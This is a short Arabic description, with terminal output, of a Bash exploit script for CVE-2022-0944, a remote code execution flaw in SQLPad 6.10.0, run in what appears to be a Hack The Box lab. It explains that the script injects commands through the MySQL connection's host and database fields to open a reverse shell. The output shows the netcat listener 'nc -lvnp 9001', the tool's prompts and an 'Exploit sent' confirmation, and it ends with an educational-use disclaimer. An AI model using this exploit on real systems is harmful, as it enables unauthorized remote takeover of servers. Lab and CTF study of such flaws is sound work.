
Refurbish
يقوم هذا السكريبت Bash باستغلال ثغرة تنفيذ أكواد عن بُعد (RCE) في SQLPad 6.10.0، مما يسمح للمهاجم بتحقيق تنفيذ أكواد عن بُعد (RCE) عن طريق إساءة استخدام حقلي host و database في إعدادات اتصال قاعدة بيانات MySQL في SQLPad. يستغل الإكسبلويت معالجة SQLPad غير الآمنة لوحدة child_process في Node.js لتنفيذ أوامر عشوائية، مما يفتح في النهاية قشرة عكسية (reverse shell) على جهاز المهاجم.
nc -lvnp 9001.┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
هذا الكود لأغراض تعليمية فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. استخدم هذا الإكسبلويت فقط بإذن.